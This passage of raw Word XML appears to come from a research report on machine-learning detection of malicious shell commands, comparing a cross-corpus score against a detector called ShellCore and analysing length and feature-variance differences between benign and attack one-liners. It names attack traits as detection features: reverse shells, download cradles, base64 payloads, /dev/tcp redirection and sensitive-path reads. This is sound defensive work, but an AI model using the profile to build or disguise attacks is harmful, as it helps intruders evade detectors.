                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Ours, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost_hybrid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, Dataset 1 → Dataset 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cross-corpus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.5319</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>22.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The floor correction does not rescue our numbers, and it should not be presented</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>as if it did: under either reading ShellCore captures about 99% of the headroom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>above its own floor and we capture three quarters of ours. The gap is real. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>argument of this section is that it is explained by the four confounds above</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rather than by modelling quality — and the load-bearing evidence for that claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is the last row. ShellCore never reports a cross-corpus result, and no published</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>figure tells us what its 99.87 would become on a corpus it had not been trained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on. Our own answer to that question, 0.5319, is the one number in this table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that was measured rather than assumed, and it is the number a defender would</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>actually experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 3 — Exploratory Data Analysis Findings (Dataset 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The command-length histogram (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_length_hist_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, density-normalized and clipped at the 99th percentile) confirms that attack one-liners are, on average, longer than benign ones: benign commands center at a mean of 37.8 characters (median 29), while attack commands run to a mean of 52.4 (median 41). The right tail is decisively heavier for attacks — the 99th percentile stretches to 227 characters versus 147 for benign — which is what a payload-carrying reverse shell, download cradle, or base64 blob looks like next to a bare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>git commit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The honest caveat is that this is a difference of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>distributions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>classes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: both labels pile up in the same 20–50 character body, and the benign curve fully envelops the attack curve there. A probe trained on length alone scores only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AUC 0.611</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the held-out test split (0.624 in-train), barely above the 0.5 no-skill line. Length is a real signal that is nearly useless as a standalone rule, because the overlap in the common range swamps the separation in the tail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The per-feature variance-by-label plot (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_variance_by_label_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) makes the same point structurally and explains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>why</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> length looks strong in aggregate yet fails as a discriminator. The features with the largest benign-vs-attack variance gap are dominated by raw-magnitude "shape" features: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> alone accounts for a gap of ~1233 (attack variance 2055 is 2.5× the benign 822), followed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and, further down, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mean_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Crucially, the gap is driven by attack commands being far more </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dispersed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not uniformly shifted — attackers produce both terse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-style probes and enormous encoded payloads, inflating variance without cleanly moving the mean. Below the size features, the gap ranking turns behavioral: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b64_run_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the longest base64 run) carries 4.3× the attack-side variance, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_sensitive_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_redirect_out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (gap 0.15, rank 11) all spike. Taken together this describes the attack profile precisely — longer commands, longer individual tokens (encoded blobs, long URLs and paths), more base64, deeper reach into the filesystem (absolute paths, then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/etc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-class targets), redirection into files or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and an explicit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> invocation.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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Benign var</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attack var</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Variance gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>821.80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2055.09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1233.28</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_token_len</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>34.75</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>112.82</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>78.08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>b64_run_len</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>19.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>82.09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>62.92</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>16.63</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>36.27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>19.64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mean_token_len</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.98</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_quotes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.56</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.33</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.76</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.63</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.87</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_abs_paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.86</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.74</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
